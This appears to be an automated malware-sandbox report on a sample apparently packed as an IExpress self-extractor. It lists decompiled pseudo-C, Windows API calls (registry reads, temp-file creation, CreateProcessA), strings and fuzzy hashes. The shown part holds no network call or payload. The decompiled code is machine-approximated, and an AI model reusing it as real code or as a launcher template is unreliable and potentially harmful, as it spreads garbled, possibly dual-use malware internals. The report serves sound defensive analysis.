                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00DE4096,?,00DE1ED3,00000001,00000000,?,?,00DE4137,?,00DE4096), ref: 00DE25CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00DE1ED3,00000001,00000000,?,?,00DE4137,?,00DE4096), ref: 00DE25DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00DE4096,00DE4096,?,00DE1ED3,00000001,00000000,?,?,00DE4137,?), ref: 00DE25FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00DE4096,00000000,00000000,00000000,00000000,?,00DE1ED3,00000001,00000000), ref: 00DE261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00DE25A8
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 00DE25C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00DE25F5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: c268b43742899757d90fbcb73909ecd315b70939485a565be01dc117206ad6c2
                                                                                                                                                                                                        • Instruction ID: 47c9bf739547e53e5c79cfdff9cf29b476911510bb4a79216d0f7968b95b64a6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c268b43742899757d90fbcb73909ecd315b70939485a565be01dc117206ad6c2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44116A359022A9BBDB20FB969C49DFFBE7CEB017A1F144155B808E2100DA709A48E6B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E00DE7155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0xde72b8);
                                                                                                                                                                                                        				E00DE7208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0xde88b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0xde88b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0xde81e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xde88b0 = _t58;
                                                                                                                                                                                                        							_t37 = E00DE6C3F(0xde10b8, 0xde10c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L00DE6FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0xde88b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0xde10b4);
                                                                                                                                                                                                        							_push(0xde10ac);
                                                                                                                                                                                                        							L00DE7202();
                                                                                                                                                                                                        							 *0xde88b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0xde88ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0xde88b4;
                                                                                                                                                                                                        						if( *0xde88b4 != 0 && E00DE7060(_t71, 0xde88b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0xde88b4; // 0x0
                                                                                                                                                                                                        							 *0xdea288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E00DE2BFB(0xde0000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0xde81e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0xde81f8;
                                                                                                                                                                                                        							if( *0xde81f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0xde81e4;
                                                                                                                                                                                                        							if( *0xde81e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0xde81e0; // 0x0
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E00DE724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00DE7182
                                                                                                                                                                                                          • Part of subcall function 00DE7155: GetCurrentProcessId.KERNEL32 ref: 00DE7191
                                                                                                                                                                                                          • Part of subcall function 00DE7155: GetCurrentThreadId.KERNEL32 ref: 00DE719A
                                                                                                                                                                                                          • Part of subcall function 00DE7155: GetTickCount.KERNEL32 ref: 00DE71A3
                                                                                                                                                                                                          • Part of subcall function 00DE7155: QueryPerformanceCounter.KERNEL32(?), ref: 00DE71B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00DE72B8,00000058), ref: 00DE6A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00DE6AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 00DE6AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 00DE6B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00DE6B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 00DE6BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 00DE6BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: ae62d9a2fe8d890aa6c4bc2269447529ab7053d247ad6d16e6bb1e0237969ef2
                                                                                                                                                                                                        • Instruction ID: 687bd1e8b92640cc21b91b1ed6fd1ab836fd306cc47e41a36da982f2f9f28ab2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae62d9a2fe8d890aa6c4bc2269447529ab7053d247ad6d16e6bb1e0237969ef2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F4107349443D5CFDB21BB6AEC8476E77A0EB547A4F68002AE945EB390CB70C840DBB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 587 de58c8-de58d5 588 de58d8-de58dd 587->588 588->588 589 de58df-de58f1 LocalAlloc 588->589 590 de5919-de5959 call de1680 call de658a CreateFileA LocalFree 589->590 591 de58f3-de5901 call de44b9 589->591 595 de5906-de5910 call de6285 590->595 601 de595b-de596c CloseHandle GetFileAttributesA 590->601 591->595 600 de5912-de5918 595->600 601->595 602 de596e-de5970 601->602 602->595 603 de5972-de597b 602->603 603->600
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00DE58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E00DE1680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E00DE658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xde9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00DE44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00DE5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE58E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00DE5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00DE5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00DE5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00DE5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-3228030758
                                                                                                                                                                                                        • Opcode ID: 2a3284c6c62eb006abedb0563964d90731e486b2931c11ebb708ae7a8650ed34
                                                                                                                                                                                                        • Instruction ID: ffa0052ce252556b4273bd020dce401646bc2b682d70037d7f5b8f0a49da1064
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a3284c6c62eb006abedb0563964d90731e486b2931c11ebb708ae7a8650ed34
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03112631700351ABC7207F7B6C8DA9B7E9DDF453A4B100615B509D72C6CA709C0586B0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 de3fef-de4010 632 de410a-de411a call de6ce0 631->632 633 de4016-de403b CreateProcessA 631->633 634 de40c4-de4101 call de6285 GetLastError FormatMessageA call de44b9 633->634 635 de4041-de406e WaitForSingleObject GetExitCodeProcess 633->635 650 de4106 634->650 638 de4070-de4077 635->638 639 de4091 call de411b 635->639 638->639 643 de4079-de407b 638->643 644 de4096-de40b8 CloseHandle * 2 639->644 643->639 646 de407d-de4089 643->646 648 de40ba-de40c0 644->648 649 de4108 644->649 646->639 647 de408b 646->647 647->639 648->649 651 de40c2 648->651 649->632 650->649 651->650
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E00DE3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E00DE6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E00DE44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0xde8a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0xde9a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0xde9a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00DE411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0xde9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00DE4033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DE4049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00DE405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00DE409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00DE40A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00DE40DC
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00DE40E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 3589f74df8a0b769975910cde9bc604b19b93af42edc915e1697f1c6f59d3b9f
                                                                                                                                                                                                        • Instruction ID: 487be74ca076b9968a549746476ac726bf8591681edf5a59edaa114dec7d3085
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3589f74df8a0b769975910cde9bc604b19b93af42edc915e1697f1c6f59d3b9f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0318631641398ABEB20BF66DC89FABB77CEBD4710F100169F649DA2A1C6305D85CB71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 652 de51e5-de520b call de468f LocalAlloc 655 de522d-de523c call de468f 652->655 656 de520d-de5228 call de44b9 call de6285 652->656 662 de523e-de5260 call de44b9 LocalFree 655->662 663 de5262-de5270 lstrcmpA 655->663 668 de52b0 656->668 662->668 666 de527e-de529c call de44b9 LocalFree 663->666 667 de5272-de5273 LocalFree 663->667 674 de529e-de52a4 666->674 675 de52a6 666->675 670 de5279-de527c 667->670 673 de52b2-de52b5 668->673 670->673 674->670 675->668
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE51E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E00DE468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E00DE468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E00DE44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0xde9124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0xde9124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00DE44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00DE44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
